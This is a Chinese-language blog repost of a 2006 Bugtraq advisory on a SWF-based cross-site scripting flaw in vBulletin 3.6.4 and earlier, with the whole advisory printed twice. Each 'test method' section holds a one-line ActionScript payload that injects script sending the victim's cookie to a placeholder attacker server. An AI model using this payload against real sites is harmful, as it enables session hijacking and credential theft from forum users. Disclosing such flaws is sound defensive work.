2006-12-31 22:39:15 by: h4x0r
vBulletin论坛 SWF 跨站漏洞
受影响系统:
VBulletin VBulletin <= 3.6.4
描述:BUGTRAQ ID: 21736
vBulletin是一款开放源代码PHP论坛程序。
vBulletin在处理恶意SWF文件时存在漏洞,远程攻击者可能利用此漏洞获取用户机器的敏感信息。
如果攻击者能够向vBulletin上传包含有恶意actionscript帧的SWF文件的话,就可能执行跨站脚本攻击,导致在日志文件中泄露基于cookie的认证凭据。
<*来源:Ashraf Morad (ashraf1984@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116707909711660&w=2
*>
测试方法:
getURL("javascript:function blab(){}var scriptNode = document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document cookie;blab();");
建议:厂商补丁:
VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=796
VBulletin VBulletin <= 3.6.4
描述:BUGTRAQ ID: 21736
vBulletin是一款开放源代码PHP论坛程序。
vBulletin在处理恶意SWF文件时存在漏洞,远程攻击者可能利用此漏洞获取用户机器的敏感信息。
如果攻击者能够向vBulletin上传包含有恶意actionscript帧的SWF文件的话,就可能执行跨站脚本攻击,导致在日志文件中泄露基于cookie的认证凭据。
<*来源:Ashraf Morad (ashraf1984@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116707909711660&w=2
*>
测试方法:
getURL("javascript:function blab(){}var scriptNode = document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document cookie;blab();");
建议:厂商补丁:
VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[Last Modified By h4x0r, at 2006-12-31 22:40:00]
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=796
There is no comment on this article.








